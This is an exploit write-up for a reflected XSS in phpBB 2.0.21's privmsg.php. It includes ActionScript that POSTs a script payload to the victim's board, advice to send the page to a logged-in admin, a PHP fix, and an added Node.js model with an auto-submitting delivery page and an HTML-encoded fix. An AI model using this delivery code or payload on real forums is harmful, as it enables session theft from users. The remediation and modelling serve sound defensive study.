phpBB (privmsg.php) XSS Exploit

By: Demential
Web: http://headburn.altervista.org 
E-mail: info@burnhead.it 
phpBB website: http://phpbb.com

Exploit tested on phpBB 2.0.21

Secunia.com said:

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash (.swf) file with this ActionScript 2 code on its main timeline:

// getURL() with "POST" sends every variable defined on this timeline as a
// form field, so the names below must match the fields of the privmsg.php
// compose form.
var username:String = "user_that_doesnt_exist"; // any name that is not registered
var subject:String = "Xss Exploitation";
var message:String = "<script>alert(document.cookie)</script>"; // placeholder payload; the original script body is not preserved in this copy
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
// Navigates the victim's own browser to privmsg.php with a POST, so the
// victim's session cookie is sent and the reflected page renders in their session.
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");

Put it into a web page (the markup that embeds the .swf is missing from this
copy; the page needs only a title and some body text around the embedded
movie):

    Put a title here

    Put some text here
And send it to the admin (or a normal user). The target must be logged in to
the board, since the POST is made by their browser with their own session
cookie.

Fixing: open phpBB2/privmsg.php and find:

    if (!($to_userdata = $db->sql_fetchrow($result)))
    {
        $error = TRUE;
        $error_msg = $lang['No_such_user'];

Replace with:

    if (!($to_userdata = $db->sql_fetchrow($result)))
    {
        $error = TRUE;
        echo "Sorry, but no such user exists.";
        exit;

This cuts the reflection off by ending the request before the compose form is
re-rendered with the submitted message body, but it prints a bare message
outside the board's templates. The less intrusive fix is to keep the original
branch and HTML-encode the message body (htmlspecialchars()) wherever it is
written back into the page.
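As an added example that is not part of the advisory or of phpBB's own code, the following Node.js script models the round trip the Flash file triggers: it builds the same POST body the movie's getURL() sends, offers a Flash-free delivery page that posts the same fields, and renders the "no such user" response both as the advisory describes it (message body echoed raw) and with the message body HTML-encoded, which is the fix a practitioner would apply instead of the echo/exit above. The field names are the advisory's; the user table, the response markup and the payload are assumptions made for the demonstration.

```javascript
// Added example, not code from the advisory or from phpBB: a Node.js model of
// the privmsg.php round trip, vulnerable rendering beside an output-encoded one.

// What the Flash movie's getURL(..., "POST") sends: its timeline variables.
const PAYLOAD = "<script>alert(document.cookie)</script>"; // placeholder payload
const EXPLOIT_FIELDS = {
  username: "user_that_doesnt_exist",
  subject: "Xss Exploitation",
  message: PAYLOAD,
  folder: "inbox",
  mode: "post",
  post: "Submit",
};

// Serialise fields as application/x-www-form-urlencoded, as the browser does
// for a form POST (space becomes "+", other bytes outside [A-Za-z0-9*-._]
// are percent-encoded).
function formBody(fields) {
  return new URLSearchParams(fields).toString();
}

// Minimal HTML encoding, the equivalent of PHP's htmlspecialchars($s, ENT_QUOTES).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" })[c]
  );
}

// Delivery without Flash: a page that submits the same POST as soon as it
// loads. The victim's browser attaches its own phpBB session cookie, exactly
// as with getURL(..., "_self", "POST").
function autoSubmitPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join("\n");
  return `<html><body onload="document.forms[0].submit()">
<form method="POST" action="${escapeHtml(action)}">
${inputs}
</form></body></html>`;
}

// Server side, modelled. parsePost() plays the role of PHP's $_POST.
const REGISTERED_USERS = new Set(["admin", "alice"]); // assumed user table
function parsePost(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// The branch the advisory patches: the recipient lookup fails and the board
// shows an error while echoing the submitted message body back into the page.
// The surrounding markup is an assumption, not phpBB's template.
function renderNoSuchUser(post, { encodeOutput }) {
  const body = encodeOutput ? escapeHtml(post.message) : post.message;
  return `<p class="gen">No such user</p>\n<div class="postbody">${body}</div>`;
}

function handlePrivmsg(body, { encodeOutput }) {
  const post = parsePost(body);
  if (post.mode !== "post" || post.post === undefined) {
    return { status: 400, html: "" };
  }
  if (REGISTERED_USERS.has(post.username)) {
    return { status: 200, html: '<p class="gen">Message sent</p>' };
  }
  return { status: 200, html: renderNoSuchUser(post, { encodeOutput }) };
}

// Check used by the demonstration: does the response carry a live <script> tag?
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

const demoBody = formBody(EXPLOIT_FIELDS);
console.log("POST body:  " + demoBody);
console.log("vulnerable: " + handlePrivmsg(demoBody, { encodeOutput: false }).html);
console.log("encoded:    " + handlePrivmsg(demoBody, { encodeOutput: true }).html);
```

Only the non-existent recipient takes the reflecting branch: a POST to a registered user never echoes the message body, which is why the exploit names a user that does not exist. With the message body passed through escapeHtml() the same request is answered with inert text, so the fix belongs at the point where the body is written into the page, not in the lookup.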
